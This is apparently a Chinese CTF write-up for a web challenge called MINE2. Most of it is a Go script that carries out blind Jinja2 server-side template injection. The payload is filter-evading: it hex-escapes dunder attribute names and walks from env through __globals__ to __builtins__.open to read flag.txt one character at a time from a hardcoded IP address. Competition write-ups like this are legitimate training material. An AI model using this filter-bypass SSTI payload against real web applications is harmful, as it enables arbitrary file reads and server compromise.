[Web] MINE2 xp0int Posted on Apr 29 2021 {{ 不能用,用{% ,不出网用盲注,config,request, \. ,\' , g ,u 空格等ban了 py脚本报错迷, 用go写就没事,坑 ``` func main() { flag:="" for i := 0; i < 40; i++ { for _, j := range "abcdef1234567890" { fmt.Println(string(j)) payload := `{%%0aif%0a"fla\x67{` +flag+string(j)+`"%0ain%0a((env|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5f\x67lobals\x5f\x5f")|attr("\x67et")("\x5f\x5fb\x75iltins\x5f\x5f"))|attr("\x67et")("open")("fla\x67\x2etxt"))|attr("read")()%0a%}123{%%0aendif%0a%}` r, _ := grequests.Get(`http://121.37.160.91:32310/success?msg=`+payload, &grequests.RequestOptions{}) fmt.Println(r.String()) ok,_:=regexp.Match("123",[]byte(r.String())) if ok{ flag+=string(j) fmt.Println(flag) break } } } } ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] pwn1 - cpt.shao [Reverse] PE - Cew
没有帐号? 立即注册